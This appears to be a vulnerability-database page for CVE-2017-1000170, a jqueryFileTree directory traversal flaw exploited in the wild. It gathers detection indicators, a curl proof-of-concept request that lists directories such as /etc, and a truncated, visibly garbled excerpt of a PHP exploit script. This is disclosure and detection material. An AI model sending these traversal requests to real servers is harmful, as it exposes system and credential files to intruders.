CVE-2017-1000170
published 2017-11-17CVE-2017-1000170: jqueryFileTree 2.1.5 and older Directory Traversal
PriorityP181high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
57.61%
99.0th percentile
jqueryFileTree 2.1.5 and older Directory Traversal
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jqueryfiletree_project | jqueryfiletree | <= 2.1.5 | — |
| jqueryfiletree_project | jqueryfiletree | 0 – 2.1.5 | — |
Detection & IOCsextracted from sources · hover to see the quote
path/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php↗
commandPOST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php body: dir=%2Fetc%2F&onlyFiles=true↗
- →Look for POST requests to the vulnerable connector path with a body containing 'dir=%2F' (URL-encoded path traversal) and 'onlyFiles=true' ↗
- →Responses from a vulnerable target will contain both a jqueryfiletree HTML structure and references to sensitive files such as 'passwd'; match both words in the response body ↗
- →Exploit tool fingerprints a vulnerable host by checking that the response to a POST with dir=/ matches the pattern 'jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)' (case-insensitive) ↗
- ·The Nuclei template targets WordPress installations specifically; the vulnerable path is under the 'delightful-downloads' WordPress plugin directory. Standalone jqueryFileTree deployments may expose the connector at a different path. ↗
- ·The exploit title references version 1.6.6 of the WordPress plugin while the CVE covers jqueryFileTree 2.1.5 and older; both are affected by the same directory traversal issue. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
jqueryFileTree vulnerable to Directory Traversal
osv·2022-05-13
CVE-2017-1000170 [HIGH] jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal
### POC:
```bash
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
```
GHSA
jqueryFileTree vulnerable to Directory Traversal
ghsa·2022-05-13
CVE-2017-1000170 [HIGH] CWE-22 jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal
### POC:
```bash
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
```
VulnCheck
jqueryfiletree_project jqueryfiletree Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2017·CVSS 7.5
CVE-2017-1000170 [HIGH] jqueryfiletree_project jqueryfiletree Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
jqueryfiletree_project jqueryfiletree Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
jqueryFileTree 2.1.5 and older Directory Traversal
Affected: jqueryfiletree_project jqueryfiletree
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-03&host_type=src&vulnerability=cve-2017-1000170; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-20&host_type=src&vulnerability=cve-2017-1000170; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2017-100
No detection rules found.
Exploit-DB
WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
exploitdb·2021-03-22·CVSS 7.5
CVE-2017-1000170 [HIGH] WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
---
# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: $data));
#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp
if($random_agent){
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
}
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
function parse_dir($str){ // by raina77ow =)
$contents = array();
$startFrom = $contentStart = $contentEnd = 0;
while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
$contentStart += 5;
$contentEnd = strpos($str, '">', $contentStart);
Nuclei
WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2017-1000170 [HIGH] WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
Template:
id: CVE-2017-1000170
info:
name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
author: dwisiswant0
severity: high
description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
impact: |
Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.
remediation: |
Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.
reference:
http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.htmlhttps://github.com/jqueryfiletree/jqueryfiletree/issues/66http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.htmlhttps://github.com/jqueryfiletree/jqueryfiletree/issues/66
2017-11-17
Published
Exploited in the wild